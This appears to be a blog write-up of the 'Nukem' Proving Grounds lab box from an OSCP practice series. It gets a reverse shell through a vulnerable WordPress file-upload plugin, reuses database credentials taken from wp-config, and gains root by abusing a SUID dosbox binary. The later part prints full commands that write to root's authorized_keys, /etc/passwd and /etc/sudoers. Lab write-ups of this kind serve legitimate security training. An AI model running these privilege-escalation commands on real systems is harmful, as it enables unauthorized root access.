[OSCP Practice Series 64] Proving Grounds — Nukem
Machine Type: Linux
The Attack
Several ports are open. Since we can’t access the MySQL port, let’s start by checking port 80.
A Wordpress site. Let’s do a WPscan.
There’s an upload directory listing and an admin user. Let’s check while brute-forcing the admin user. There are also some plugins.
The Simple File List plugin we discovered is version 4.2.2, which has an arbitrary file upload vulnerability.
The tutor plugin we discovered is version 1.5.3, which has an LFI vulnerability.
Let’s try the Simple File List exploit. We need to modify the payload first to obtain the shell.
I make the payload a simple PHP code execution.
The file got uploaded. Let’s check.
It works, but I encountered an issue with obtaining the shell. So, I decided to insert the Pentest Monkey PHP reverse shell into the script.
We are in!
No wonder I’m having issues getting the shell. We are inside an Arch Linux environment.
We got database data.
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );
/** MySQL database username */
define( 'DB_USER', 'commander' );
/** MySQL database password */
define( 'DB_PASSWORD', 'CommanderKeenVorticons1990' );
/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );
/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );There’s also a user named ‘commander’ on the machine. Perhaps the database password is the same as the user password.
Nice we got ‘commander’.
local.txt: 577de43148160ce318ebfa113c35c5c3We can’t run sudo.
I found a strange SUID binary. After searching for vulnerable ones, it turns out dosbox is vulnerable.
It seems like we can perform arbitrary file writes here. Let’s try writing to the root’s authorized_keys file.
LFILE='/root/.ssh/authorized_keys'
/usr/bin/dosbox -c 'mount c /' -c "echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDcmhGBzENvyn61dSb13B2hNZZVCyJZSMGytQmYg0cayjdxYKQojQkMGZo9K36KXhzupI1UXW3Xyu/BpM4zTLrVM2vfb7ayP2a3b/HO2hd5SZrRhEuSRCSB8zofdrAf3wekbYABvCS6iiZ15cQyBeu5+jSRDZpdaZN34/F1mh5UIDUZwZMgmuJapTTZqgYnlLqewEgR7BjyFydZxR+kwXkD+9B5jAmQeX34AI5gOoNZwlYbbM/qkD7nNpFVEG58PJG4IwQHoUtkO7MjAYcpIG8I7kTmrJ6pyRN8UFR/mClcvZZUV259RQ5Il1UBG3yYSteDa8tunpb8ugiynPgPDpU647wnsMPH8mli5ozTcBBnHyGrnwLxL481vNiDFDjxfuBoddI8Yxiu1kpP7vrCD5knW5jmK9ykUuej2BvTfZrLyctgEdCDXn0F6dHsMW6kzzeIZq8SULW6GJ1EldM5qkg269NqOSuAckJ9N2KvwKTln68YYg5zLD9tHEVYgaxE4Q0= shatternox@pepper > c:$LFILE" -c exitDoesn’t work. Let’s try to add /etc/passwd entry.
openssl passwd asd123
LFILE='/etc/passwd'
/usr/bin/dosbox -c 'mount c /' -c "echo shatternox:\$1\$ZcfsueEb\$XYBEDdtPACqWJML3/drmC1:0:0:root:/root:/bin/bash >> c:$LFILE" -c exit
What the hell, I must have done something wrong. I’ll just add an entry to /etc/sudoers.
LFILE='/etc/sudoers'
/usr/bin/dosbox -c 'mount c /' -c "echo commander ALL=(ALL) NOPASSWD: ALL >> c:$LFILE" -c exit
Nice, GG.
proof.txt: 5cda2896f4752228d3235ac4ae5e5b92